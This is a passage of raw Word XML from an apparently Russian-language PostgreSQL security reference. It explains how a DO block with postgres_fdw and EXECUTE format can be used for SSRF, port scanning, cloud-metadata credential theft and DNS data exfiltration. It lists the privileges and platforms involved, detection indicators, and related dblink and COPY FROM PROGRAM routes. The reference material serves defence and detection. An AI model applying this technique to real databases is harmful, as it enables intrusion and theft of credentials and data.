      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>анонимный plpgsql-блок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PostgreSQL парсит и исполняет его как одну SQL-команду (одна запись в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но внутри тело — целая plpgsql-программа с несколькими DDL/DML statements. Ключевой момент: цепочка из 5+ команд уходит на сервер как один statement, не требует ни stacked-queries (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), ни прав на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для CREATE FUNCTION нужен CREATE на схеме; для DO — нет, доступен по умолчанию). Side-effect (CREATE SERVER, USER MAPPING, FOREIGN TABLE) применяются в той же транзакции что и DO — при ошибке откат, при успехе остаются в каталоге как мусор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851E31C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('... OPTIONS (host %L, ...)', expr)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обязателен потому, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только строковые литералы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не expressions. Парсер обрабатывает значения OPTIONS на этапе DDL до evaluation выражений. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host current_user)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает с syntax error; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с динамически собранной строкой работает только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для безопасной literal-quote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08828F87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при PERFORM не вызывает коннект, потому что libpq падает на пустом host раньше getaddrinfo. Поэтому повреждённый исходный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER app_src OPTIONS (host '', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> безвреден — атакующий создаёт второй SERVER (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ev</w:t>
      </w:r>
      <w:r>
        <w:t>) с собственным host и работает только с ним.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8E62B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32B4F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атака требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>цепочки трёх привилегий</w:t>
      </w:r>
      <w:r>
        <w:t>. Частичная выдача не открывает атаку — нужны все три последовательно:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D557485" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`USAGE ON FOREIGN DATA WRAPPER postgres_fdw`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без этого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permission denied for foreign-data wrapper postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По умолчанию выдан только superuser-у (postgres_fdw NOT trusted). Можно делегировать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT USAGE ON FOREIGN DATA WRAPPER postgres_fdw TO appuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это даёт право создавать SERVER, но всё ещё не открывает атаку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263F7C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`CREATE` на текущей схеме</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нужно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (таблица создаётся в search_path-первой схеме). По умолчанию роль имеет CREATE на своей user-schema; в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после PG 15 — только у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_database_owner</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20251829" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Право `CREATE USER MAPPING`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — у владельца SERVER есть по умолчанию (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CURRENT_USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> становится owner-ом).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C9D55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Дополнительно:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCA7CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`CREATE EXTENSION postgres_fdw`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельный шаг до атаки, требует superuser. Если extension уже установлен (RDS preinstalled, Kubernetes-операторы, любая managed-PG с включённым FDW) — шаг пропускается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E998D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен с 9.3; SSRF-поведение не менялось).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46657889" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Egress:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP до целевого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host:port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для SSRF), UDP/53 до authoritative DNS атакующего (для DNS-канала).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDF018" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208097C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B2C40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_foreign_server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> foreign-серверы редко меняются — массовое создание/удаление в окне атаки = аномалия. Имена в стиле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ev_&lt;md5&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t_ev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t_meta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — никогда не легитимны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED31E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER ... OPTIONS (host '&lt;подстановка&gt;')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через динамический SQL — в легитимном коде host всегда литерал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA00332" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от backend-процессов с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, содержащим одновременно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практически всегда атака; легитимная регистрация FDW делается админ-скриптами не из приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A777B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Коннекты с PG-хоста на link-local (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>169.254.0.0/16</w:t>
      </w:r>
      <w:r>
        <w:t>), broadcast, нестандартные порты в RFC1918-диапазонах, порты 445/3389/22 — почти никогда не легитимны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7BC0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   DNS-запросы от PG-хоста к доменам с длинными hex-labels — общий маркер с 3.6.1 (см. там).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE56CFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Резкий рост ошибок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>could not establish connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>connection refused</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL log от backend-процессов — типичный артефакт port scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25928625" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0130F7C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (фактически 9.3 – 17, поведение не менялось).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9E924A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на AWS RDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> preinstalled, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет USAGE; egress в IMDS зависит от VPC-конфига и hop-limit; на Google Cloud SQL — preinstalled, USAGE даётся через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, egress на link-local закрыт; на Supabase — extension отключён по умолчанию, включается owner-ом проекта. Детальный разбор — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F0A89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23ED0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как параллельный OOB-канал с другой моделью привилегий (PUBLIC после установки extension vs superuser-only для FDW). Если в кластере есть оба — атакующий использует тот, что доступен под текущей ролью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A1046" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3, 3.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — file-read через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернативный OOB-вектор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025F0D46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE: загруженные cloud metadata IAM-credentials можно использовать для эскалации в cloud-side; локальный chain через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> если у роли есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
